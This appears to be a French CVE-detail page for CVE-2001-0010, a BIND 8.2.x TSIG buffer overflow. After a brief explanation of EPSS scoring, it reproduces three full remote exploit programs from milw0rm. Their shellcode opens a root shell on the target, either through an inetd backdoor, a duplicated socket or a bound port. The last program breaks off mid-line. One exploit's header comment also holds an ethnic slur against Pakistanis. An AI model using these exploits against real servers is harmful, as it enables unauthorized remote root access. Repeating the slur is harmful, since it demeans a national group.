CVE-2001-0010 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

/* * tsig0wn.c * Copyright Field Marshal August Wilhelm Anton Count Neithardt von Gneisenau * gneisenau@berlin.com * The author is not and will not be held responsible for the action of * other people using this code. * provided for informational purposes only * since a greetz section is de rigeur * greets to my luv scharnie, sheib, darkx, famzah, brainstorm, ghQst, robbot, ...... * a special fuck to all pakis including those idiots from GForce, etc.... * but then pakistan is one big village comprising exclusively of prize idiots * tabstop set at 3 */ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/nameser.h> #include <netdb.h> #include <errno.h> #include <unistd.h> #include <string.h> #include <stdio.h> /* * This shellcode sux. cant ever get around to coding another one. */ char shellcode[] = { 0xeb,0x3b,0x5e,0x31,0xc0,0x31,0xdb,0xb0,0xa0,0x89, 0x34,0x06,0x8d,0x4e,0x07,0x88,0x19,0x41,0xb0,0xa4, 0x89,0x0c,0x06,0x8d,0x4e,0x0a,0x88,0x19,0x41,0xb0, 0xa8,0x89,0x0c,0x06,0x31,0xd2,0xb0,0xac,0x89,0x14, 0x06,0x89,0xf3,0x89,0xf1,0xb0,0xa0,0x01,0xc1,0xb0, 0x0b,0xcd,0x80,0x31,0xc0,0xb0,0x01,0x31,0xdb,0xcd, 0x80,0xe8,0xc0,0xff,0xff,0xff,0x2f,0x62,0x69,0x6e, 0x2f,0x73,0x68,0xff,0x2d,0x63,0xff, 0x2f,0x62,0x69,0x6e,0x2f,0x65,0x63,0x68,0x6f,0x20,0x27,0x69, 0x6e,0x67,0x72,0x65,0x73,0x6c,0x6f,0x63,0x6b,0x20,0x73,0x74, 0x72,0x65,0x61,0x6d,0x20,0x74,0x63,0x70,0x20,0x6e,0x6f,0x77, 0x61,0x69,0x74,0x20,0x72,0x6f,0x6f,0x74,0x20,0x2f,0x62,0x69, 0x6e,0x2f,0x62,0x61,0x73,0x68,0x20,0x62,0x61,0x73,0x68,0x20, 0x20,0x2d,0x69,0x27,0x3e,0x2f,0x74,0x6d,0x70,0x2f,0x2e,0x69, 0x6e,0x65,0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x3b,0x20,0x2f, 0x75,0x73,0x72,0x2f,0x73,0x62,0x69,0x6e,0x2f,0x69,0x6e,0x65, 0x74,0x64,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x2e,0x69,0x6e,0x65, 0x74,0x64,0x2e,0x63,0x6f,0x6e,0x66,0x00, }; #define NS_T_TSIG 250 #define SHELLCODE_OFFSET 13 #define DUMMY_ARG_OFFSET 176 #define ENUM_FILE 1 //eventlib_p.h line 141 struct { char *system_name; unsigned int buffer_start; /* the address where out buffer starts in memory */ unsigned int frame_pointer; /* content of the frame pointer */ int garbage_len; /* length of the garbage in which we will embed ebp|eip */ } system[] = { { "Test value 1", 0xbffff640, 0xbffff868, 326, }, { "Test value 2", 0xbffff5f0, 0xbffff700, 326, }, { "Slackware 7.0", 0xbffff590, 0xbffff7e8, 326, }, { NULL, 0x0, 0x0, }, }; void usage (void); void encode_dns_name (char *, int, int); int main (int argc, char *argv[]) { char query[PACKETSZ]; // construct our query packet here char *query_ptr; // pointer to walk the query buffer HEADER *hdr_ptr; // pointer to the header part of the query buffer int arg; unsigned int buffer_start, frame_pointer, // value the frame pointer will have shellcode_addr; // address our shellcode will have in the named buffer calculated from buffer_start int index; char *target_name; struct hostent *target_host; struct sockaddr_in target; int sockfd; if (argc < 2) usage (); while ((arg = getopt (argc, argv, "b:f:s:")) != -1) { switch (arg){ case 'b': sscanf (optarg, "%x", &buffer_start); break; case 'f': sscanf (optarg, "%x", &frame_pointer); break; case 's': index = atoi (optarg) - 1; buffer_start = system[index].buffer_start; frame_pointer = system[index].frame_pointer; break; default : usage (); } } if (!(target_name = argv[optind])){ fprintf (stderr, "tsig0wn: abysmal m0r0n error\n"); exit (1); } /* * Form a header. */ memset (query, 0, PACKETSZ); // cud blow up on other architectures not as liberal as x86. an union like in the bind sources is the correct way to go. hdr_ptr = (HEADER *)query; hdr_ptr->id = htons (0x1234); hdr_ptr->qr = 0; hdr_ptr->opcode = 0; hdr_ptr->qdcount = htons (2); hdr_ptr->arcount = htons (1); /* * Form a query after the header where we put in the shellcode */ query_ptr = (char *) (hdr_ptr + 1); memcpy (query_ptr, shellcode, strlen (shellcode)+1); query_ptr += strlen (shellcode) + 1; PUTSHORT (T_A, query_ptr); PUTSHORT (C_IN, query_ptr); /* * we form another header here that contains garbage with embedded stuff * i cud have put this in the same header as the shellcode and have the * shellcode nullify. (shrug) */ { char *tmp; unsigned long dummy_argument = buffer_start+DUMMY_ARG_OFFSET; frame_pointer &= 0xffffff00; // zero out the LSB like the overflow in ns_sign will do // this will make layout a domain name for the second query, within which // we will embed our ebp | eip encode_dns_name (query_ptr, system[index].garbage_len, (frame_pointer - buffer_start) - (query_ptr - query)); query_ptr += system[index].garbage_len; shellcode_addr = buffer_start + SHELLCODE_OFFSET; printf ("buffer starts at address = 0x%x\n", buffer_start); printf ("saved frame pointer after overwrite = 0x%x\n", frame_pointer); printf ("shellcode will reside at address = 0x%x\n", shellcode_addr); printf ("dummy argument will reside at address = 0x%x\n", dummy_argument); // put in the type member of evEvent_p. File is what we need tmp = query + DUMMY_ARG_OFFSET; tmp[0] = ENUM_FILE; tmp[1] = ENUM_FILE >> 8; tmp[2] = ENUM_FILE >> 16; tmp[3] = ENUM_FILE >> 24; // embed the addresses. These will be interpreted as ebp and eip. // we put the address where our shellcode will be situated twice. // we overflow the saved frame pointer of datagram_read(). when the // function returns to __evDispatch() it calls __evDrop(). // because we have shifted the frame pointer and thus __evDispatch() // notion of the stack we also provide two pointers as arguments to // __evDispatch. These pointers point to the start of this query header // name, within which __evDrop will look for evEvent_p->type. we set // type to be of type 'file' above which causes it to break and execute // FREE() which in turn calls free(). tmp = query + (frame_pointer - buffer_start); // advance the ptr to the place where we put in our ebp|eip tmp[0] = shellcode_addr; tmp[1] = shellcode_addr >> 8; tmp[2] = shellcode_addr >> 16; tmp[3] = shellcode_addr >> 24; tmp[4] = shellcode_addr; tmp[5] = shellcode_addr >> 8; tmp[6] = shellcode_addr >> 16; tmp[7] = shellcode_addr >> 24; tmp[8] = dummy_argument; tmp[9] = dummy_argument >> 8; tmp[10] = dummy_argument >> 16; tmp[11] = dummy_argument >> 24; tmp[12] = dummy_argument; tmp[13] = dummy_argument >> 8; tmp[14] = dummy_argument >> 16; tmp[15] = dummy_argument >> 24; } PUTSHORT (T_A, query_ptr); PUTSHORT (C_IN, query_ptr); /* * Additional section containing T_SIG stuff */ // a name with only one char memcpy (query_ptr, "\x01m\x00", 3); query_ptr+=3; PUTSHORT (NS_T_TSIG, query_ptr); PUTSHORT (C_IN, query_ptr); // these members wont be checked at all as find_key returns NULL on testing secretkey_info. // PUTLONG (0, query_ptr); // PUTSHORT (0, query_ptr); /* * Connect and deliver the payload */ if (!(target_host = gethostbyname (target_name))){ fprintf (stderr, "host name resolution error for %s: %s\n", target_name, hstrerror (h_errno)); exit (1); } if ((sockfd = socket (PF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0){ perror ("socket"); exit (1); } memset (&target, 0, sizeof (target)); target.sin_family = AF_INET; target.sin_port = htons (53); target.sin_addr.s_addr = ((struct in_addr *)target_host->h_addr_list[0])->s_addr; if (connect (sockfd, &target, sizeof (target)) < 0){ perror ("connect"); exit (1); } if (send (sockfd, query, query_ptr - query, 0) < 0){ perror ("send"); exit (1); } exit (0); } void usage (void) { int i; fprintf (stderr, " tsig0wn\n"); fprintf (stderr, "Copyright Field Marshal August Wilhelm Anton Count Neithardt von Gneisenau\n"); fprintf (stderr, "\nAvailable System Types\n"); for (i = 0; system[i].system_name; i++) fprintf (stderr, "%d. %s\n", i+1, system[i].system_name); fprintf (stderr, "\nUsage:\n"); fprintf (stderr, "tsig0wn [ -s system type ] target\nor\n"); fprintf (stderr, "tsig0wn [ -b buffer start address ] [ -f frame pointer content ] target\n"); exit (1); } /* * a pretty convoluted function. * len is the number of octects to fill in (including the length octect) * embed_pos is the position where we need to embed this |len|ebp|eip|. * Hopefully when we overwrite the saved ebp on the stack * we expect it to point here and take the eip (which in turn points to our * shellcode) from here. The challenge here is to lay out the octets so * that it doesnt clash with embed_pos. */ void encode_dns_name (char *buf, int len, int embed_pos) { int ctr = 0; int adjusted = 0; embed_pos -= 2; // our ebp | eip needs the length octet before it, so adjust for it now + 1 len--; // for the NULL octet at the end. // sanity check if (embed_pos >= len){ fprintf (stderr, "encode_dns_name: embed_pos >= len\n"); exit (1); } while (ctr < len) // max 63 octets allowed + preceding 1 octet for length if (ctr+64 <= len){ // enough space for another 63+1 if (ctr+64 <= embed_pos || adjusted){ // embed_pos not in between *buf++ = 63; memset (buf, 'g', 63); buf += 63; ctr+=64; } else { // need to adjust cuz embed_pos in between *buf++ = embed_pos-ctr-1; memset (buf, 'o', embed_pos-ctr-1); buf += embed_pos-ctr-1; ctr+= embed_pos-ctr; adjusted++; } } else { if (len - ctr <= embed_pos || adjusted){ // only remaining len - ctr *buf++ = len-ctr-1; memset (buf, 'g', len-ctr-1); ctr += 63; // we are quitting anyway after this. no need to update ctrs } else{ *buf++ = embed_pos-len-ctr-1; memset (buf, 'o', embed_pos-len-ctr-1); buf += embed_pos-len-ctr-1; ctr += embed_pos-len-ctr; adjusted++; } } *buf=0x00; // finish with a 0 } // milw0rm.com [2001-03-01]

/*## copyright LAST STAGE OF DELIRIUM feb 2001 poland *://lsd-pl.net/ #*/ /*## bind 8.2 8.2.1 8.2.2 8.2.2-PX Slackware 4.0/RedHat 6.2 #*/ /* The code establishes a TCP connection with port 53 of a target system. */ /* It makes use of the "infoleak" bug (through UDP) to obtain the base */ /* value of the named process frame stack pointer, which is later used */ /* for constructing proper DNS tsig exploit packet. */ /* */ /* Upon successful exploitation the assembly routine gets executed. It */ /* walks the descriptor table of the exploited named process in a search */ /* for the socket descriptor of the previously established TCP connection. */ /* Found descriptor is duplicated on stdin, stdout and stderr and /bin/sh */ /* is spawned. */ /* */ /* The use of such an assembly routine allows successfull exploitation of */ /* the vulnerability in the case when vulnerable dns servers are protected */ /* by tightly configured firewall systems (with only 53 tcp/udp port open). */ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <rpc/rpc.h> #include <netdb.h> #include <stdio.h> #include <errno.h> char msg[]={ 0xab,0xcd,0x09,0x80,0x00,0x00,0x00,0x01, 0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00, 0x01,0x20,0x20,0x20,0x20,0x02,0x61 }; char asmcode[]= "\x3f" /* label len 63 */ "\x90\x90\x90" /* padding */ "\xeb\x3b" /* jmp <asmcode+65> */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x5f" /* popl %edi */ "\x83\xef\x7c" /* sub $0x7c,%edi */ "\x8d\x77\x10" /* leal 0x10(%edi),%esi */ "\x89\x77\x04" /* movl %esi,0x4(%edi) */ "\x8d\x4f\x20" /* leal 0x20(%edi),%ecx */ "\x89\x4f\x08" /* movl %ecx,0x8(%edi) */ "\xb3\x10" /* movb $0x10,%bl */ "\x89\x19" /* movl %ebx,(%ecx) */ "\x31\xc9" /* xorl %ecx,%ecx */ "\xb1\xff" /* movb $0xff,%cl */ "\x89\x0f" /* movl %ecx,(%edi) */ "\x51" /* pushl %ecx */ "\x31\xc0" /* xorl %eax,%eax */ "\xb0\x66" /* movb $0x66,%al */ "\xb3\x07" /* movb $0x7,%bl */ "\x89\xf9" /* movl %edi,%ecx */ "\xcd\x80" /* int $0x80 */ "\x59" /* popl %ecx */ "\x31\xdb" /* xorl %ebx,%ebx */ "\x39\xd8" /* cmpl %ebx,%eax */ "\x75\x0a" /* jne <asmcode+62> */ "\x66\xbb\x12\x34" /* movw $0x1234,%bx */ "\x66\x39\x5e\x02" /* cmpw %bx,0x2(%esi) */ "\x74\x08" /* je <asmcode+70> */ "\xe2\xe0" /* loop <asmcode+32> */ "\x3f" /* label len 63 */ "\xe8\xc0\xff\xff\xff" /* call <asmcode+6> */ "\x89\xcb" /* movl %ecx,%ebx */ "\x31\xc9" /* xorl %ecx,%ecx */ "\xb1\x03" /* movb $0x03,%cl */ "\x31\xc0" /* xorl %eax,%eax */ "\xb0\x3f" /* movb $0x3f,%al */ "\x49" /* decl %ecx */ "\xcd\x80" /* int $0x80 */ "\x41" /* incl %ecx */ "\xe2\xf6" /* loop <asmcode+76> */ "\xeb\x14" /* jmp <asmcode+108> */ "\x31\xc0" /* xorl %eax,%eax */ "\x5b" /* popl %ebx */ "\x8d\x4b\x14" /* leal 0x14(%ebx),%ecx */ "\x89\x19" /* movl %ebx,(%ecx) */ "\x89\x43\x18" /* movl %eax,0x18(%ebx) */ "\x88\x43\x07" /* movb %al,0x7(%ebx) */ "\x31\xd2" /* xorl %edx,%edx */ "\xb0\x0b" /* movb $0xb,%al */ "\xcd\x80" /* int $0x80 */ "\xe8\xe7\xff\xff\xff" /* call <asmcode+88> */ "/bin/sh" "\x90\x90\x90\x90" /* padding */ "\x90\x90\x90\x90" ; int rev(int a){ int i=1; if((*(char*)&i)) return(a); return((a>>24)&0xff)|(((a>>16)&0xff)<<8)|(((a>>8)&0xff)<<16)|((a&0xff)<<24); } int main(int argc,char **argv){ char buffer[1024],*b; int i,c,n,sck[2],fp,ptr6,jmp,cnt,ofs,flag=-1; struct hostent *hp; struct sockaddr_in adr; printf("copyright LAST STAGE OF DELIRIUM feb 2001 poland //lsd-pl.net/\n"); printf("bind 8.2 8.2.1 8.2.2 8.2.2PX for slackware 4.0/redhat 6.2 x86\n\n"); if(argc<2){ printf("usage: %s address [-s][-e]\n",argv[0]); printf(" -s send infoleak packet\n"); printf(" -e send exploit packet\n"); exit(-1); } while((c=getopt(argc-1,&argv[1],"se"))!=-1){ switch(c){ case 's': flag=1;break; case 'e': flag=2; } } if(flag==-1) exit(-1); adr.sin_family=AF_INET; adr.sin_port=htons(53); if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1) { if((hp=gethostbyname(argv[1]))==NULL) { errno=EADDRNOTAVAIL;goto err; } memcpy(&adr.sin_addr.s_addr,hp->h_addr,4); } sck[0]=socket(AF_INET,SOCK_DGRAM,0); sck[1]=socket(AF_INET,SOCK_STREAM,0); if(connect(sck[0],(struct sockaddr*)&adr,sizeof(adr))<0) goto err; if(connect(sck[1],(struct sockaddr*)&adr,sizeof(adr))<0) goto err; i=sizeof(struct sockaddr_in); if(getsockname(sck[1],(struct sockaddr*)&adr,&i)==-1){ struct netbuf {unsigned int maxlen;unsigned int len;char *buf;}; struct netbuf nb; ioctl(sck[1],(('S'<<8)|2),"sockmod"); nb.maxlen=0xffff; nb.len=sizeof(struct sockaddr_in);; nb.buf=(char*)&adr; ioctl(sck[1],(('T'<<8)|144),&nb); } n=ntohs(adr.sin_port); asmcode[4+48+2]=(unsigned char)((n>>8)&0xff); asmcode[4+48+3]=(unsigned char)(n&0xff); if(write(sck[0],msg,sizeof(msg))==-1) goto err; if((cnt=read(sck[0],buffer,sizeof(buffer)))==-1) goto err; printf("stack dump:\n"); for(i=0;i<(cnt-512);i++){ printf("%s%02x ",(i&&(!(i%16)))?"\n":"",(unsigned char)buffer[512+i]); } printf("\n\n"); fp=rev(*(unsigned int*)&buffer[532]); ofs=0xfe-((fp-(fp&0xffffff00))&0xff); cnt=163; if((buffer[512+20+2]!=(char)0xff)&&(buffer[512+20+3]!=(char)0xbf)){ printf("system does not seem to be a vulnerable linux\n");exit(1); } if(flag==1){ printf("system seems to be running bind 8.2.x on a linux\n");exit(-1); } if(cnt<(ofs+28)){ printf("frame ptr is too low to be successfully exploited\n");exit(-1); } jmp=rev(fp-586); ptr6=rev((fp&0xffffff00)-12); fp=rev(fp&0xffffff00); printf("frame ptr=0x%08x adr=%08x ofs=%d ",rev(fp),rev(jmp),ofs); printf("port=%04x connected! ",(unsigned short)n);fflush(stdout); b=buffer; memcpy(b,"\xab\xcd\x01\x00\x00\x02\x00\x00\x00\x00\x00\x01",12);b+=12; for(i=0;i<strlen(asmcode);i++) *b++=asmcode[i]; for(i=0;i<(128>>1);i++,b++) *b++=0x01; memcpy(b,"\x00\x00\x01\x00\x01",5);b+=5; for(i=0;i<((ofs+64)>>1);i++,b++) *b++=0x01; *b++=28; memcpy(b,"\x06\x00\x00\x00",4);b+=4; memcpy(b,&fp,4);b+=4; memcpy(b,"\x06\x00\x00\x00",4);b+=4; memcpy(b,&jmp,4);b+=4; memcpy(b,&jmp,4);b+=4; memcpy(b,&fp,4);b+=4; memcpy(b,&ptr6,4);b+=4; cnt-=ofs+28; for(i=0;i<(cnt>>1);i++,b++) *b++=0x01; memcpy(b,"\x00\x00\x01\x00\x01\x00\x00\xfa\xff",9);b+=9; if(write(sck[0],buffer,b-buffer)==-1) goto err; sleep(1);printf("sent!\n"); write(sck[1],"/bin/uname -a\n",14); while(1){ fd_set fds; FD_ZERO(&fds); FD_SET(0,&fds); FD_SET(sck[1],&fds); if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){ int cnt; char buf[1024]; if(FD_ISSET(0,&fds)){ if((cnt=read(0,buf,1024))<1){ if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else break; } write(sck[1],buf,cnt); } if(FD_ISSET(sck[1],&fds)){ if((cnt=read(sck[1],buf,1024))<1){ if(errno==EWOULDBLOCK||errno==EAGAIN) continue; else break; } write(1,buf,cnt); } } } exit(0); err: perror("error");exit(-1); } // milw0rm.com [2001-03-01]

/* * This exploit has been fixed and extensive explanation and clarification * added. * Cleanup done by: * Ian Goldberg <ian@cypherpunks.ca> * Jonathan Wilkins <jwilkins@bitland.net> * NOTE: the default installation of RedHat 6.2 seems to not be affected * due to the compiler options. If BIND is built from source then the * bug is able to manifest itself. */ /* * Original Comment: * lame named 8.2.x remote exploit by * * Ix [adresadeforward@yahoo.com] (the master of jmpz), * lucysoft [lucysoft@hotmail.com] (the master of queries) * * this exploits the named INFOLEAK and TSIG bug (see http://www.isc.org/products/BIND/bind-security.html) * linux only shellcode * this is only for demo purposes, we are not responsable in any way for what you do with this code. * * flamez - canaris * greetz - blizzard, netman. * creditz - anathema <anathema@hack.co.za> for the original shellcode * - additional code ripped from statdx exploit by ron1n * * woo, almost forgot... this exploit is pretty much broken (+4 errors), but we hope you got the idea. * if you understand how it works, it won't be too hard to un-broke it */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <signal.h> #include <time.h> #include <string.h> #include <ctype.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <sys/time.h> #include <sys/types.h> #include <sys/socket.h> #include <arpa/inet.h> #include <arpa/nameser.h> #define max(a,b) ((a)>(b)?(a):(b)) #define BUFFSIZE 4096 int argevdisp1, argevdisp2; char shellcode[] = /* The numbers at the right indicate the number of bytes the call takes * and the number of bytes used so far. This needs to be lower than * 62 in order to fit in a single Query Record. 2 are used in total to * send the shell code */ /* main: */ /* "callz" is more than 127 bytes away, so we jump to an intermediate spot first */ "\xeb\x44" /* jmp intr */ // 2 - 2 /* start: */ "\x5e" /* popl %esi */ // 1 - 3 /* socket() */ "\x29\xc0" /* subl %eax, %eax */ // 2 - 5 "\x89\x46\x10" /* movl %eax, 0x10(%esi) */ // 3 - 8 "\x40" /* incl %eax */ // 1 - 9 "\x89\xc3" /* movl %eax, %ebx */ // 2 - 11 "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */ // 3 - 14 "\x40" /* incl %eax */ // 1 - 15 "\x89\x46\x08" /* movl %eax, 0x08(%esi) */ // 3 - 18 "\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ // 3 - 21 "\xb0\x66" /* movb $0x66, %al */ // 2 - 23 "\xcd\x80" /* int $0x80 */ // 2 - 25 /* bind() */ "\x43" /* incl %ebx */ // 1 - 26 "\xc6\x46\x10\x10" /* movb $0x10, 0x10(%esi) */ // 4 - 30 "\x66\x89\x5e\x14" /* movw %bx, 0x14(%esi) */ // 4 - 34 "\x88\x46\x08" /* movb %al, 0x08(%esi) */ // 3 - 37 "\x29\xc0" /* subl %eax, %eax */ // 2 - 39 "\x89\xc2" /* movl %eax, %edx */ // 2 - 41 "\x89\x46\x18" /* movl %eax, 0x18(%esi) */ // 3 - 44 /* * the port address in hex (0x9000 = 36864), if this is changed, then a similar * change must be made in the connection() call * NOTE: you only get to set the high byte */ "\xb0\x90" /* movb $0x90, %al */ // 2 - 46 "\x66\x89\x46\x16" /* movw %ax, 0x16(%esi) */ // 4 - 50 "\x8d\x4e\x14" /* leal 0x14(%esi), %ecx */ // 3 - 53 "\x89\x4e\x0c" /* movl %ecx, 0x0c(%esi) */ // 3 - 56 "\x8d\x4e\x08" /* leal 0x08(%esi), %ecx */ // 3 - 59 "\xeb\x02" /* jmp cont */ // 2 - 2 /* intr: */ "\xeb\x43" /* jmp callz */ // 2 - 4 /* cont: */ "\xb0\x66" /* movb $0x66, %al */ // 2 - 6 "\xcd\x80" /* int $0x80 */ // 2 - 10 /* listen() */ "\x89\x5e\x0c" /* movl %ebx, 0x0c(%esi) */ // 3 - 11 "\x43" /* incl %ebx */ // 1 - 12 "\x43" /* incl %ebx */ // 1 - 13 "\xb0\x66" /* movb $0x66, %al */ // 2 - 15 "\xcd\x80" /* int $0x80 */ // 2 - 17 /* accept() */ "\x89\x56\x0c" /* movl %edx, 0x0c(%esi) */ // 3 - 20 "\x89\x56\x10" /* movl %edx, 0x10(%esi) */ // 3 - 23 "\xb0\x66" /* movb $0x66, %al */ // 2 - 25 "\x43" /* incl %ebx */ // 1 - 26 "\xcd\x80" /* int $0x80 */ // 1 - 27 /* dup2(s, 0); dup2(s, 1); dup2(s, 2); */ "\x86\xc3" /* xchgb %al, %bl */ // 2 - 29 "\xb0\x3f" /* movb $0x3f, %al */ // 2 - 31 "\x29\xc9" /* subl %ecx, %ecx */ // 2 - 33 "\xcd\x80" /* int $0x80 */ // 2 - 35 "\xb0\x3f" /* movb $0x3f, %al */ // 2 - 37 "\x41" /* incl %ecx */ // 1 - 38 "\xcd\x80" /* int $0x80 */ // 2 - 40 "\xb0\x3f" /* movb $0x3f, %al */ // 2 - 42 "\x41" /* incl %ecx */ // 1 - 43 "\xcd\x80" /* int $0x80 */ // 2 - 45 /* execve() */ "\x88\x56\x07" /* movb %dl, 0x07(%esi) */ // 3 - 48 "\x89\x76\x0c" /* movl %esi, 0x0c(%esi) */ // 3 - 51 "\x87\xf3" /* xchgl %esi, %ebx */ // 2 - 53 "\x8d\x4b\x0c" /* leal 0x0c(%ebx), %ecx */ // 3 - 56 "\xb0\x0b" /* movb $0x0b, %al */ // 2 - 58 "\xcd\x80" /* int $0x80 */ // 2 - 60 "\x90" /* callz: */ "\xe8\x72\xff\xff\xff" /* call start */ // 5 - 5 "/bin/sh"; /* There's a NUL at the end here */ // 8 - 13 unsigned long resolve_host(char* host) { long res; struct hostent* he; if (0 > (res = inet_addr(host))) { if (!(he = gethostbyname(host))) return(0); res = *(unsigned long*)he->h_addr; } return(res); } int dumpbuf(char *buff, int len) { char line[17]; int x; /* print out a pretty hex dump */ for(x=0;x<len;x++){ if(!(x%16) && x){ line[16] = 0; printf("\t%s\n", line); } printf("%02X ", (unsigned char)buff[x]); if(isprint((unsigned char)buff[x])) line[x%16]=buff[x]; else line[x%16]='.'; } printf("\n"); } void runshell(int sockd) { char buff[1024]; int fmax, ret; fd_set fds; fmax = max(fileno(stdin), sockd) + 1; send(sockd, "uname -a; id;\n", 15, 0); for(;;) { FD_ZERO(&fds); FD_SET(fileno(stdin), &fds); FD_SET(sockd, &fds); if(select(fmax, &fds, NULL, NULL, NULL) < 0) { exit(EXIT_FAILURE); } if(FD_ISSET(sockd, &fds)) { bzero(buff, sizeof buff); if((ret = recv(sockd, buff, sizeof buff, 0)) < 0) { exit(EXIT_FAILURE); } if(!ret) { fprintf(stderr, "Connection closed\n"); exit(EXIT_FAILURE); } write(fileno(stdout), buff, ret); } if(FD_ISSET(fileno(stdin), &fds)) { bzero(buff, sizeof buff); ret = read(fileno(stdin), buff, sizeof buff); if(send(sockd, buff, ret, 0) != ret) { fprintf(stderr, "Transmission loss\n"); exit(EXIT_FAILURE); } } } } connection(struct sockaddr_in host) { int sockd; host.sin_port = htons(36864); printf("[*] connecting..\n"); usleep(2000); if((sockd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) { exit(EXIT_FAILURE); } if(connect(sockd, (struct sockaddr *) &host, sizeof host) != -1) { printf("[*] wait for your shell..\n"); usleep(500); runshell(sockd); } else { printf("[x] error: named not vulnerable or wrong offsets used\n"); } close(sockd); } int infoleak_qry(char* buff) { HEADER* hdr; int n, k; char* ptr; int qry_space = 12; int dummy_names = 7; int evil_size = 0xff; memset(buff, 0, BUFFSIZE); hdr = (HEADER*)buff; hdr->id = htons(0xbeef); hdr->opcode = IQUERY; hdr->rd = 1; hdr->ra = 1; hdr->qdcount = htons(0); hdr->nscount = htons(0); hdr->ancount = htons(1); hdr->arcount = htons(0); ptr = buff + sizeof(HEADER); printf("[d] HEADER is %d long\n", sizeof(HEADER)); n = 62; for(k=0; k < dummy_names; k++) { *ptr++ = n; ptr += n; } ptr += 1; PUTSHORT(1/*ns_t_a*/, ptr); /* type */ PUTSHORT(T_A, ptr); /* class */ PUTLONG(1, ptr); /* ttl */ PUTSHORT(evil_size, ptr); /* our *evil* size */ return(ptr - buff + qry_space); } int evil_query(char* buff, int offset) { int lameaddr, shelladdr, rroffsetidx, rrshellidx, deplshellcode, offset0; HEADER* hdr; char *ptr; int k, bufflen; u_int n, m; u_short s; int i; int shelloff, shellstarted, shelldone; int towrite, ourpack; int n_dummy_rrs = 7; printf("[d] evil_query(buff, %08x)\n", offset); printf("[d] shellcode is %d long\n", sizeof(shellcode)); shelladdr = offset - 0x200; lameaddr = shelladdr + 0x300; ourpack = offset - 0x250 + 2; towrite = (offset & ~0xff) - ourpack - 6; printf("[d] olb = %d\n", (unsigned char) (offset & 0xff)); rroffsetidx = towrite / 70; offset0 = towrite - rroffsetidx * 70; if ((offset0 > 52) || (rroffsetidx > 6)) { printf("[x] could not write our data in buffer (offset0=%d, rroffsetidx=%d)\n", offset0, rroffsetidx); return(-1); } rrshellidx = 1; deplshellcode = 2; hdr = (HEADER*)buff; memset(buff, 0, BUFFSIZE); /* complete the header */ hdr->id = htons(0xdead); hdr->opcode = QUERY; hdr->rd = 1; hdr->ra = 1; hdr->qdcount = htons(n_dummy_rrs); hdr->ancount = htons(0); hdr->arcount = htons(1); ptr = buff + sizeof(HEADER); shellstarted = 0; shelldone = 0; shelloff = 0; n = 63; for (k = 0; k < n_dummy_rrs; k++) { *ptr++ = (char)n; for(i = 0; i < n-2; i++) { if((k == rrshellidx) && (i == deplshellcode) && !shellstarted) { printf("[*] injecting shellcode at %d\n", k); shellstarted = 1; } if ((k == rroffsetidx) && (i == offset0)) { *ptr++ = lameaddr & 0x000000ff; *ptr++ = (lameaddr & 0x0000ff00) >> 8; *ptr++ = (lameaddr & 0x00ff0000) >> 16; *ptr++ = (lameaddr & 0xff000000) >> 24; *ptr++ = shelladdr & 0x000000ff; *ptr++ = (shelladdr & 0x0000ff00) >> 8; *ptr++ = (shelladdr & 0x00ff0000) >> 16; *ptr++ = (shelladdr & 0xff000000) >> 24; *ptr++ = argevdisp1 & 0x000000ff; *ptr++ = (argevdisp1 & 0x0000ff00) >> 8; *ptr++ = (argevdisp1 & 0x00ff0000) >> 16; *ptr++ = (argevdisp1 & 0xff000000) >> 24; *ptr++ = argevdisp2 & 0x000000ff; *ptr++ = (argevdisp2 & 0x0000ff00) >> 8; *ptr++ = (argevdisp2 & 0x00ff0000) >> 16; *ptr++ = (argevdisp2 & 0xff000000) >> 24; i += 15; } else { if (shellstarted && !shelldone) { *ptr++ = shellcode[shelloff++]; if(shelloff == (sizeof(shellcode))) shelldone=1; } else { *ptr++ = i; } } } /* OK: this next set of bytes constitutes the end of the * NAME field, the QTYPE field, and the QCLASS field. * We have to have the shellcode skip over these bytes, * as well as the leading 0x3f (63) byte for the next * NAME field. We do that by putting a jmp instruction * here. */ *ptr++ = 0xeb; if (k == 0) { *ptr++ = 10; /* For alignment reasons, we need to stick an extra * NAME segment in here, of length 3 (2 + header). */ m = 2; *ptr++ = (char)m; // header ptr += 2; } else { *ptr++ = 0x07; } /* End the NAME with a compressed pointer. Note that it's * not clear that the value used, C0 00, is legal (it * points to the beginning of the packet), but BIND apparently * treats such things as name terminators, anyway. */ *ptr++ = 0xc0; /*NS_CMPRSFLGS*/ *ptr++ = 0x00; /*NS_CMPRSFLGS*/ ptr += 4; /* QTYPE, QCLASS */ } /* Now we make the TSIG AR */ *ptr++ = 0x00; /* Empty name */ PUTSHORT(0xfa, ptr); /* Type TSIG */ PUTSHORT(0xff, ptr); /* Class ANY */ bufflen = ptr - buff; // dumpbuf(buff, bufflen); return(bufflen); } long xtract_offset(char* buff, int len) { long ret; /* Here be dragons. */ /* (But seriously, the values here depend on compilation options * used for BIND. */ ret = *((long*)&buff[0x214]); argevdisp1 = 0x080d7cd0; argevdisp2 = *((long*)&buff[0x264]); printf("[d] argevdisp1 = %08x, argevdisp2 = %08x\n", argevdisp1, argevdisp2); // dumpbuf(buff, len); return(ret); } int main(int argc, char* argv[]) { struct sockaddr_in sa; int sock; long address; char buff[BUFFSIZE]; int len, i; long offset; socklen_t reclen; unsigned char foo[4]; printf("[*] named 8.2.x (< 